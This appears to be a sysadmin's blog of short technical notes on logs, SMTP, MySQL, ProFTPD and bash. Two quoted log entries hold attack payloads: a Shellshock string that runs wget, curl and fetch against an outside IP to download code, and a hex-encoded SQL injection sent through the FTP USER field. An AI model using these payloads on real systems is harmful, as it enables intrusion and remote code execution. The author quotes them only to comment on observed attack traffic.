You know you're skilled as a hacker when you're so fast, you don't even need to configure your scanning scripts:
106.51.29.122 - - [01/Aug/2016:13:49:38 -0400] ***.******.*** "GET HTTP/1.1 HTTP/1.1" 400 340 "-" "()
{ :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ;
curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://185.125.4.222/YOUR_URL_HERE\");'"
They're trying to use a the Shellshock vulnerability I think.
tcp 0 0 XX.XX.XX.XX:44101 XX.XX.XX.XX:1521 ESTABLISHED That is Java's Oracle driver choosing a source port at random, which is what it does all the time. Only this time the port chosen is used by Java's RMI, so a different app was unable to startup, it failed when trying to bind to port 44101. Of course Oracle connections come and go, so with no user action, the problem went away in about 10 minutes
A
Google has started requiring incoming mail to comply with more of RFC2822, particularly with respect to headers; to wit they won't accept incoming mail without a "From:" header. If you try to send without on, you'll get a rejection like this:
this message is not RFC 2822 compliant. To reduce the amount of spam 5.7.1 sent to Gmail, this message has been blocked. Please review 5.7.1 RFC 2822 specifications for more information. iw4si27447595pac.153 - gsmtp
This isn't an issue when you use a mail client, but if you're manually entering SMTP commands, it adds an extra requirement. The following is a conforming session, or at least conforming enough -- the RFC requires a Date header as well, but Google isn't enforcing that
$ telnet smtp-server 25
220 SMTP_SERVER Microsoft ESMTP MAIL Service ready at Thu, 27 Jun 2013 22:45:15 -0400
helo
250 SMTP_SERVER Hello [10.103.13.44]
mail from: my_address@domain
250 2.1.0 Sender OK
rcpt to: target_address@domain.gmail.com
250 2.1.5 Recipient OK
data
354 Start mail input; end with <CRLF>.<CRLF>
From: ME
Subject: testing SMTP
this is a test
(props to)
A
Neat little MySQL trick:
mysql> \P grep -v Sleep
PAGER set to 'grep -v Sleep'
filters out the idle connections from the output of 'show processlist'
A
Had to do some work with ProFTPD logs today. This script was created to get the date of last login of a user, or a list of multiple users, and return that data as a .csv file. If you have customized the log formats, you may need to tweek the regex that breaks apart the line.
Several bits are incomplete, including the proper handling of timezone offsets and usage text in the help routine, but it works if you pass it a logfile and either a name or a namefile
$ get_last_login.pl --log=auth.log --namefile=username_list.txt > last_login.csv
or
$ get_last_login.pl --log=auth.log --name=am_user > last_login.csv
In doing this work, I noticed something fun, people are now trying SQL injection through FTP:
ProFTPD Default Installation [32717] ###.###.###.### [24/Feb/2013:00:16:23 -0500] "USER %')
UNION SELECT 1,concat(0x7b,0x6d,0x64,0x35,0x7d,0x78,0x4d,0x70,0x43,0x4f,0x4b,0x43,0x35,0x49,0x34,0x49,0x4e,
0x7a,0x46,0x43,0x61,0x62,0x33,0x57,0x45,0x6d,0x77,0x3d,0x3d),NULL,NULL,concat(0x2f),concat(0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68) #" 331
A
Helpful hint, if you have a bash script with a function calling getopts, i.e.
make_tarball() {
local START=`get_start_time`
## declare some variables
.....
local OPTARG OPTIND
## Parse the args
while getopts "s:d:a:x:X:v" ARG
do
case $ARG in
s) SOURCE_PATH="$SOURCE_PATH $OPTARG"
;;
....
esac
done
you MUST make OPTIND a local variable, or a second (third, etc) call to the function will fail, with OPTIND too large to see any of the arguments
blegh
A
